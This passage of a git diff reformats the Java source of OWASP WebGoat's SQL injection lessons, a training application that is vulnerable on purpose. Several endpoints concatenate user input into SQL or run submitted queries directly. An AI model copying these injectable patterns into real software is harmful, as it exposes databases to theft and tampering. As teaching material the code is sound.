-import java.io.IOException;
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-
 @RestController
 public class SqlInjectionLesson6b extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson6b(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
+  public SqlInjectionLesson6b(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
+
+  @PostMapping("/SqlInjectionAdvanced/attack6b")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String userid_6b) throws IOException {
+    if (userid_6b.equals(getPassword())) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 
-    @PostMapping("/SqlInjectionAdvanced/attack6b")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String userid_6b) throws IOException {
-        if (userid_6b.equals(getPassword())) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
+  protected String getPassword() {
+    String password = "dave";
+    try (Connection connection = dataSource.getConnection()) {
+      String query = "SELECT password FROM user_system_data WHERE user_name = 'dave'";
+      try {
+        Statement statement =
+            connection.createStatement(
+                ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+        ResultSet results = statement.executeQuery(query);
+
+        if (results != null && results.first()) {
+          password = results.getString("password");
         }
+      } catch (SQLException sqle) {
+        sqle.printStackTrace();
+        // do nothing
+      }
+    } catch (Exception e) {
+      e.printStackTrace();
+      // do nothing
     }
-
-    protected String getPassword() {
-        String password = "dave";
-        try (Connection connection = dataSource.getConnection()) {
-            String query = "SELECT password FROM user_system_data WHERE user_name = 'dave'";
-            try {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                        ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
-
-                if (results != null && results.first()) {
-                    password = results.getString("password");
-                }
-            } catch (SQLException sqle) {
-                sqle.printStackTrace();
-                // do nothing
-            }
-        } catch (Exception e) {
-            e.printStackTrace();
-            // do nothing
-        }
-        return (password);
-    }
+    return (password);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java
index 4e526d605..e7c03139a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/advanced/SqlInjectionQuiz.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.advanced;
 
+import java.io.IOException;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.GetMapping;
@@ -30,49 +31,57 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.io.IOException;
-
 /**
- * add a question: 1. Append new question to JSON string
- * 2. add right solution to solutions array
- * 3. add Request param with name of question to method head
- * For a more detailed description how to implement the quiz go to the quiz.js file in webgoat-container -> js
+ * add a question: 1. Append new question to JSON string 2. add right solution to solutions array 3.
+ * add Request param with name of question to method head For a more detailed description how to
+ * implement the quiz go to the quiz.js file in webgoat-container -> js
  */
 @RestController
 public class SqlInjectionQuiz extends AssignmentEndpoint {
 
-    String[] solutions = {"Solution 4", "Solution 3", "Solution 2", "Solution 3", "Solution 4"};
-    boolean[] guesses = new boolean[solutions.length];
+  String[] solutions = {"Solution 4", "Solution 3", "Solution 2", "Solution 3", "Solution 4"};
+  boolean[] guesses = new boolean[solutions.length];
 
-    @PostMapping("/SqlInjectionAdvanced/quiz")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String[] question_0_solution, @RequestParam String[] question_1_solution, @RequestParam String[] question_2_solution, @RequestParam String[] question_3_solution, @RequestParam String[] question_4_solution) throws IOException {
-        int correctAnswers = 0;
+  @PostMapping("/SqlInjectionAdvanced/quiz")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String[] question_0_solution,
+      @RequestParam String[] question_1_solution,
+      @RequestParam String[] question_2_solution,
+      @RequestParam String[] question_3_solution,
+      @RequestParam String[] question_4_solution)
+      throws IOException {
+    int correctAnswers = 0;
 
-        String[] givenAnswers = {question_0_solution[0], question_1_solution[0], question_2_solution[0], question_3_solution[0], question_4_solution[0]};
+    String[] givenAnswers = {
+      question_0_solution[0],
+      question_1_solution[0],
+      question_2_solution[0],
+      question_3_solution[0],
+      question_4_solution[0]
+    };
 
-        for (int i = 0; i < solutions.length; i++) {
-            if (givenAnswers[i].contains(solutions[i])) {
-                // answer correct
-                correctAnswers++;
-                guesses[i] = true;
-            } else {
-                // answer incorrect
-                guesses[i] = false;
-            }
-        }
-
-        if (correctAnswers == solutions.length) {
-            return success(this).build();
-        } else {
-            return failed(this).build();
-        }
+    for (int i = 0; i < solutions.length; i++) {
+      if (givenAnswers[i].contains(solutions[i])) {
+        // answer correct
+        correctAnswers++;
+        guesses[i] = true;
+      } else {
+        // answer incorrect
+        guesses[i] = false;
+      }
     }
 
-    @GetMapping("/SqlInjectionAdvanced/quiz")
-    @ResponseBody
-    public boolean[] getResults() {
-        return this.guesses;
+    if (correctAnswers == solutions.length) {
+      return success(this).build();
+    } else {
+      return failed(this).build();
     }
+  }
 
+  @GetMapping("/SqlInjectionAdvanced/quiz")
+  @ResponseBody
+  public boolean[] getResults() {
+    return this.guesses;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java
index fc76b5d49..a8f68f0f6 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjection.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class SqlInjection extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "1.sql.injection.title";
-    }
+  @Override
+  public String getTitle() {
+    return "1.sql.injection.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java
index 89a75ab9c..55f802116 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson10.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,75 +35,94 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint.10.1", "SqlStringInjectionHint.10.2", "SqlStringInjectionHint.10.3", "SqlStringInjectionHint.10.4", "SqlStringInjectionHint.10.5", "SqlStringInjectionHint.10.6"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint.10.1",
+      "SqlStringInjectionHint.10.2",
+      "SqlStringInjectionHint.10.3",
+      "SqlStringInjectionHint.10.4",
+      "SqlStringInjectionHint.10.5",
+      "SqlStringInjectionHint.10.6"
+    })
 public class SqlInjectionLesson10 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson10(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson10(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/attack10")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String action_string) {
-        return injectableQueryAvailability(action_string);
-    }
+  @PostMapping("/SqlInjection/attack10")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String action_string) {
+    return injectableQueryAvailability(action_string);
+  }
 
-    protected AttackResult injectableQueryAvailability(String action) {
-        StringBuilder output = new StringBuilder();
-        String query = "SELECT * FROM access_log WHERE action LIKE '%" + action + "%'";
+  protected AttackResult injectableQueryAvailability(String action) {
+    StringBuilder output = new StringBuilder();
+    String query = "SELECT * FROM access_log WHERE action LIKE '%" + action + "%'";
 
-        try (Connection connection = dataSource.getConnection()) {
-            try {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
+    try (Connection connection = dataSource.getConnection()) {
+      try {
+        Statement statement =
+            connection.createStatement(
+                ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+        ResultSet results = statement.executeQuery(query);
 
-                if (results.getStatement() != null) {
-                    results.first();
-                    output.append(SqlInjectionLesson8.generateTable(results));
-                    return failed(this).feedback("sql-injection.10.entries").output(output.toString()).build();
-                } else {
-                    if (tableExists(connection)) {
-                        return failed(this).feedback("sql-injection.10.entries").output(output.toString()).build();
-                    } else {
-                        return success(this).feedback("sql-injection.10.success").build();
-                    }
-                }
-            } catch (SQLException e) {
-                if (tableExists(connection)) {
-                    return failed(this).output("<span class='feedback-negative'>" + e.getMessage() + "</span><br>" + output.toString()).build();
-                } else {
-                    return success(this).feedback("sql-injection.10.success").build();
-                }
-            }
-
-        } catch (Exception e) {
-            return failed(this).output("<span class='feedback-negative'>" + e.getMessage() + "</span>").build();
+        if (results.getStatement() != null) {
+          results.first();
+          output.append(SqlInjectionLesson8.generateTable(results));
+          return failed(this)
+              .feedback("sql-injection.10.entries")
+              .output(output.toString())
+              .build();
+        } else {
+          if (tableExists(connection)) {
+            return failed(this)
+                .feedback("sql-injection.10.entries")
+                .output(output.toString())
+                .build();
+          } else {
+            return success(this).feedback("sql-injection.10.success").build();
+          }
         }
-    }
-
-    private boolean tableExists(Connection connection) {
-        try {
-            Statement stmt = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-            ResultSet results = stmt.executeQuery("SELECT * FROM access_log");
-            int cols = results.getMetaData().getColumnCount();
-            return (cols > 0);
-        } catch (SQLException e) {
-            String errorMsg = e.getMessage();
-            if (errorMsg.contains("object not found: ACCESS_LOG")) {
-                return false;
-            } else {
-                System.err.println(e.getMessage());
-                return false;
-            }
+      } catch (SQLException e) {
+        if (tableExists(connection)) {
+          return failed(this)
+              .output(
+                  "<span class='feedback-negative'>"
+                      + e.getMessage()
+                      + "</span><br>"
+                      + output.toString())
+              .build();
+        } else {
+          return success(this).feedback("sql-injection.10.success").build();
         }
-    }
+      }
 
+    } catch (Exception e) {
+      return failed(this)
+          .output("<span class='feedback-negative'>" + e.getMessage() + "</span>")
+          .build();
+    }
+  }
+
+  private boolean tableExists(Connection connection) {
+    try {
+      Statement stmt =
+          connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+      ResultSet results = stmt.executeQuery("SELECT * FROM access_log");
+      int cols = results.getMetaData().getColumnCount();
+      return (cols > 0);
+    } catch (SQLException e) {
+      String errorMsg = e.getMessage();
+      if (errorMsg.contains("object not found: ACCESS_LOG")) {
+        return false;
+      } else {
+        System.err.println(e.getMessage());
+        return false;
+      }
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java
index 328ac3a4a..5540f31a4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson2.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,12 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import static java.sql.ResultSet.CONCUR_READ_ONLY;
+import static java.sql.ResultSet.TYPE_SCROLL_INSENSITIVE;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,47 +37,45 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-import static java.sql.ResultSet.CONCUR_READ_ONLY;
-import static java.sql.ResultSet.TYPE_SCROLL_INSENSITIVE;
-
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint2-1", "SqlStringInjectionHint2-2", "SqlStringInjectionHint2-3", "SqlStringInjectionHint2-4"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint2-1",
+      "SqlStringInjectionHint2-2",
+      "SqlStringInjectionHint2-3",
+      "SqlStringInjectionHint2-4"
+    })
 public class SqlInjectionLesson2 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson2(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
-
-    @PostMapping("/SqlInjection/attack2")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String query) {
-        return injectableQuery(query);
-    }
-
-    protected AttackResult injectableQuery(String query) {
-        try (var connection = dataSource.getConnection()) {
-            Statement statement = connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY);
-            ResultSet results = statement.executeQuery(query);
-            StringBuilder output = new StringBuilder();
-
-            results.first();
-
-            if (results.getString("department").equals("Marketing")) {
-                output.append("<span class='feedback-positive'>" + query + "</span>");
-                output.append(SqlInjectionLesson8.generateTable(results));
-                return success(this).feedback("sql-injection.2.success").output(output.toString()).build();
-            } else {
-                return failed(this).feedback("sql-injection.2.failed").output(output.toString()).build();
-            }
-        } catch (SQLException sqle) {
-            return failed(this).feedback("sql-injection.2.failed").output(sqle.getMessage()).build();
-        }
+  public SqlInjectionLesson2(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
+
+  @PostMapping("/SqlInjection/attack2")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String query) {
+    return injectableQuery(query);
+  }
+
+  protected AttackResult injectableQuery(String query) {
+    try (var connection = dataSource.getConnection()) {
+      Statement statement = connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY);
+      ResultSet results = statement.executeQuery(query);
+      StringBuilder output = new StringBuilder();
+
+      results.first();
+
+      if (results.getString("department").equals("Marketing")) {
+        output.append("<span class='feedback-positive'>" + query + "</span>");
+        output.append(SqlInjectionLesson8.generateTable(results));
+        return success(this).feedback("sql-injection.2.success").output(output.toString()).build();
+      } else {
+        return failed(this).feedback("sql-injection.2.failed").output(output.toString()).build();
+      }
+    } catch (SQLException sqle) {
+      return failed(this).feedback("sql-injection.2.failed").output(sqle.getMessage()).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java
index a1ec2cc40..f34c9302d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson3.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,13 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import static java.sql.ResultSet.CONCUR_READ_ONLY;
+import static java.sql.ResultSet.TYPE_SCROLL_INSENSITIVE;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,54 +38,47 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-import static java.sql.ResultSet.CONCUR_READ_ONLY;
-import static java.sql.ResultSet.TYPE_SCROLL_INSENSITIVE;
-
-
 @RestController
 @AssignmentHints(value = {"SqlStringInjectionHint3-1", "SqlStringInjectionHint3-2"})
 public class SqlInjectionLesson3 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson3(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson3(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/attack3")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String query) {
-        return injectableQuery(query);
-    }
+  @PostMapping("/SqlInjection/attack3")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String query) {
+    return injectableQuery(query);
+  }
 
-    protected AttackResult injectableQuery(String query) {
-        try (Connection connection = dataSource.getConnection()) {
-            try (Statement statement = connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY)) {
-                Statement checkStatement = connection.createStatement(TYPE_SCROLL_INSENSITIVE,
-                        CONCUR_READ_ONLY);
-                statement.executeUpdate(query);
-                ResultSet results = checkStatement.executeQuery("SELECT * FROM employees WHERE last_name='Barnett';");
-                StringBuilder output = new StringBuilder();
-                // user completes lesson if the department of Tobi Barnett now is 'Sales'
-                results.first();
-                if (results.getString("department").equals("Sales")) {
-                    output.append("<span class='feedback-positive'>" + query + "</span>");
-                    output.append(SqlInjectionLesson8.generateTable(results));
-                    return success(this).output(output.toString()).build();
-                } else {
-                    return failed(this).output(output.toString()).build();
-                }
-
-            } catch (SQLException sqle) {
-                return failed(this).output(sqle.getMessage()).build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage()).build();
+  protected AttackResult injectableQuery(String query) {
+    try (Connection connection = dataSource.getConnection()) {
+      try (Statement statement =
+          connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY)) {
+        Statement checkStatement =
+            connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY);
+        statement.executeUpdate(query);
+        ResultSet results =
+            checkStatement.executeQuery("SELECT * FROM employees WHERE last_name='Barnett';");
+        StringBuilder output = new StringBuilder();
+        // user completes lesson if the department of Tobi Barnett now is 'Sales'
+        results.first();
+        if (results.getString("department").equals("Sales")) {
+          output.append("<span class='feedback-positive'>" + query + "</span>");
+          output.append(SqlInjectionLesson8.generateTable(results));
+          return success(this).output(output.toString()).build();
+        } else {
+          return failed(this).output(output.toString()).build();
         }
+
+      } catch (SQLException sqle) {
+        return failed(this).output(sqle.getMessage()).build();
+      }
+    } catch (Exception e) {
+      return failed(this).output(this.getClass().getName() + " : " + e.getMessage()).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java
index 28bd50d3e..2299becc4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson4.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,13 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import static java.sql.ResultSet.CONCUR_READ_ONLY;
+import static java.sql.ResultSet.TYPE_SCROLL_INSENSITIVE;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -32,50 +38,43 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-import static java.sql.ResultSet.CONCUR_READ_ONLY;
-import static java.sql.ResultSet.TYPE_SCROLL_INSENSITIVE;
-
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint4-1", "SqlStringInjectionHint4-2", "SqlStringInjectionHint4-3"})
+@AssignmentHints(
+    value = {"SqlStringInjectionHint4-1", "SqlStringInjectionHint4-2", "SqlStringInjectionHint4-3"})
 public class SqlInjectionLesson4 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson4(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson4(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjection/attack4")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String query) {
-        return injectableQuery(query);
-    }
+  @PostMapping("/SqlInjection/attack4")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String query) {
+    return injectableQuery(query);
+  }
 
-    protected AttackResult injectableQuery(String query) {
-        try (Connection connection = dataSource.getConnection()) {
-            try (Statement statement = connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY)) {
-                statement.executeUpdate(query);
-                connection.commit();
-                ResultSet results = statement.executeQuery("SELECT phone from employees;");
-                StringBuilder output = new StringBuilder();
-                // user completes lesson if column phone exists
-                if (results.first()) {
-                    output.append("<span class='feedback-positive'>" + query + "</span>");
-                    return success(this).output(output.toString()).build();
-                } else {
-                    return failed(this).output(output.toString()).build();
-                }
-            } catch (SQLException sqle) {
-                return failed(this).output(sqle.getMessage()).build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage()).build();
+  protected AttackResult injectableQuery(String query) {
+    try (Connection connection = dataSource.getConnection()) {
+      try (Statement statement =
+          connection.createStatement(TYPE_SCROLL_INSENSITIVE, CONCUR_READ_ONLY)) {
+        statement.executeUpdate(query);
+        connection.commit();
+        ResultSet results = statement.executeQuery("SELECT phone from employees;");
+        StringBuilder output = new StringBuilder();
+        // user completes lesson if column phone exists
+        if (results.first()) {
+          output.append("<span class='feedback-positive'>" + query + "</span>");
+          return success(this).output(output.toString()).build();
+        } else {
+          return failed(this).output(output.toString()).build();
         }
+      } catch (SQLException sqle) {
+        return failed(this).output(sqle.getMessage()).build();
+      }
+    } catch (Exception e) {
+      return failed(this).output(this.getClass().getName() + " : " + e.getMessage()).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java
index 9f031d45c..32db401fa 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -23,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import javax.annotation.PostConstruct;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -31,66 +35,74 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.annotation.PostConstruct;
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint5-1", "SqlStringInjectionHint5-2", "SqlStringInjectionHint5-3", "SqlStringInjectionHint5-4"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint5-1",
+      "SqlStringInjectionHint5-2",
+      "SqlStringInjectionHint5-3",
+      "SqlStringInjectionHint5-4"
+    })
 public class SqlInjectionLesson5 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson5(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
+  public SqlInjectionLesson5(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
+
+  @PostConstruct
+  public void createUser() {
+    // HSQLDB does not support CREATE USER with IF NOT EXISTS so we need to do it in code (using
+    // DROP first will throw error if user does not exists)
+    try (Connection connection = dataSource.getConnection()) {
+      try (var statement =
+          connection.prepareStatement("CREATE USER unauthorized_user PASSWORD test")) {
+        statement.execute();
+      }
+    } catch (Exception e) {
+      // user already exists continue
     }
+  }
 
-    @PostConstruct
-    public void createUser() {
-        // HSQLDB does not support CREATE USER with IF NOT EXISTS so we need to do it in code (using DROP first will throw error if user does not exists)
-        try (Connection connection = dataSource.getConnection()) {
-            try (var statement = connection.prepareStatement("CREATE USER unauthorized_user PASSWORD test")) {
-                statement.execute();
-            }
-        } catch (Exception e) {
-            //user already exists continue
+  @PostMapping("/SqlInjection/attack5")
+  @ResponseBody
+  public AttackResult completed(String query) {
+    createUser();
+    return injectableQuery(query);
+  }
+
+  protected AttackResult injectableQuery(String query) {
+    try (Connection connection = dataSource.getConnection()) {
+      try (Statement statement =
+          connection.createStatement(
+              ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE)) {
+        statement.executeQuery(query);
+        if (checkSolution(connection)) {
+          return success(this).build();
         }
+        return failed(this).output("Your query was: " + query).build();
+      }
+    } catch (Exception e) {
+      return failed(this)
+          .output(
+              this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + query)
+          .build();
     }
+  }
 
-    @PostMapping("/SqlInjection/attack5")
-    @ResponseBody
-    public AttackResult completed(String query) {
-        createUser();
-        return injectableQuery(query);
-    }
-
-    protected AttackResult injectableQuery(String query) {
-        try (Connection connection = dataSource.getConnection()) {
-            try (Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE)) {
-                statement.executeQuery(query);
-                if (checkSolution(connection)) {
-                    return success(this).build();
-                }
-                return failed(this).output("Your query was: " + query).build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(this.getClass().getName() + " : " + e.getMessage() + "<br> Your query was: " + query).build();
-        }
-    }
-
-    private boolean checkSolution(Connection connection) {
-        try {
-            var stmt = connection.prepareStatement("SELECT * FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES WHERE TABLE_NAME = ? AND GRANTEE = ?");
-            stmt.setString(1, "GRANT_RIGHTS");
-            stmt.setString(2, "UNAUTHORIZED_USER");
-            var resultSet = stmt.executeQuery();
-            return resultSet.next();
-        } catch (SQLException throwables) {
-            return false;
-        }
-
+  private boolean checkSolution(Connection connection) {
+    try {
+      var stmt =
+          connection.prepareStatement(
+              "SELECT * FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES WHERE TABLE_NAME = ? AND GRANTEE ="
+                  + " ?");
+      stmt.setString(1, "GRANT_RIGHTS");
+      stmt.setString(2, "UNAUTHORIZED_USER");
+      var resultSet = stmt.executeQuery();
+      return resultSet.next();
+    } catch (SQLException throwables) {
+      return false;
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java
index 0a6429ee8..59a29ff10 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/introduction/SqlInjectionLesson5a.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.introduction;
 
+import java.sql.*;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
@@ -31,90 +32,105 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
